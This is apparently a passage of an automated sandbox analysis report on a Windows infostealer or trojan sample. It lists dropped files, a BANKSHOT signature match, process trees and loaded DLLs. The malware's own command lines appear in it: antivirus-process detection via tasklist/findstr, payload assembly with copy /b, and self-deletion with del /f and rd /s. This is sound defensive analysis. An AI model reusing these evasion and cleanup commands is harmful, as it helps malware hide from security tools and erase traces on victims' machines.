Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00221FC0	18_2_00221FC0
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_0022BFD6	18_2_0022BFD6

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: String function: 00211A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: String function: 00228B30 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: String function: 00220D17 appears 70 times

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 18.2.Predicted.pif.49c8038.8.raw.unpack, type: UNPACKEDPE

Matched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/

Source: file.exe	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: file.exe	Static PE information: Section: iulrnrzg ZLIB complexity 0.9947329231401255
Source: axplong.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9974614696866485
Source: axplong.exe.0.dr	Static PE information: Section: iulrnrzg ZLIB complexity 0.9947329231401255

Source: JKJDBA.18.dr

Binary string: #WriteOfflineHivesTerminateSetupModuleds\security\cryptoapi\cryptosetup\cryptosetup.cDCryptoSetup module terminatedCryptoSetupNewRegistryCallBackCryptoSetup EntropyWrite given invalid event typeCryptoSetup EntropyWrite given invalid event data sizeWriteEntropyToNewRegistryCryptoSetup failed to get Ksecdd entropy %08xRNGCryptoSetup failed to open system hive key %08xExternalEntropyCryptoSetup failed to write entropy into the system hive %08xCryptoSetup failed to close system hive key %08xCryptoSetup succeeded writing entropy key\Device\KsecDDWriteCapiMachineGuidCryptoSetup failed get entropy from ksecdd for CAPI machine guid %08x%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02xCryptoSetup failed to convert CAPI machine guid to string %08xMicrosoft\CryptographyCryptoSetup failed get open/create reg key for CAPI machine guid %08xMachineGuidCryptoSetup failed get write CAPI machine guid %08xCryptoSetup assigned CAPI machine guid "%s"

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@33/45@3/3

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_0026A6AD GetLastError,FormatMessageW,

18_2_0026A6AD

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00258DE9 AdjustTokenPrivileges,CloseHandle,		18_2_00258DE9
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Code function: 18_2_00259399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		18_2_00259399

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe

Code function: 8_2_0040400B GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

8_2_0040400B

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_00264148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

18_2_00264148

Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe

Code function: 8_2_00402218 CoCreateInstance,

8_2_00402218

Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif

Code function: 18_2_0026443D __swprintf,__swprintf,FindResourceW,LoadResource,LockResource,FindResourceW,LoadResource,SizeofResource,LockResource,CreateIconFromResourceEx,

18_2_0026443D

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seo[1].exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2208:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\SysWOW64\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4101354716.000000006C20F000.00000002.00000001.01000000.0000000C.sdmp, Predicted.pif, 00000012.00000002.4094514125.0000000031092000.00000004.00000800.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp, nss3.dll.18.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: CBKJJE.18.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: Predicted.pif, 00000012.00000002.4073968065.000000000CBD8000.00000002.00001000.00020000.00000000.sdmp, Predicted.pif, 00000012.00000002.4074207582.000000000D00E000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: Predicted.pif, 00000012.00000002.4087515334.00000000251B2000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.18.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;

Source: file.exe	ReversingLabs: Detection: 55%
Source: file.exe	Virustotal: Detection: 60%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: axplong.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\file.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe "C:\Users\user\AppData\Local\Temp\1000156001\seo.exe"
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 419591
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAVEDBEDFLESHPROVIDED" Waves
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif Predicted.pif J
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\EBGCFBGCBFHJ" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe "C:\Users\user\AppData\Local\Temp\1000156001\seo.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Vote Vote.cmd & Vote.cmd & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe ekrn.exe nswscsvc.exe sophoshealth.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 419591	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SAVEDBEDFLESHPROVIDED" Waves	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Poll + ..\Memorabilia + ..\Kenny + ..\Rick + ..\Britannica + ..\Circuits J	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif Predicted.pif J	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\419591\Predicted.pif	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\419591\Predicted.pif" & rd /s /q "C:\ProgramData\EBGCFBGCBFHJ" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000156001\seo.exe	Section loaded: bcp47langs.dll	Jump to behavior
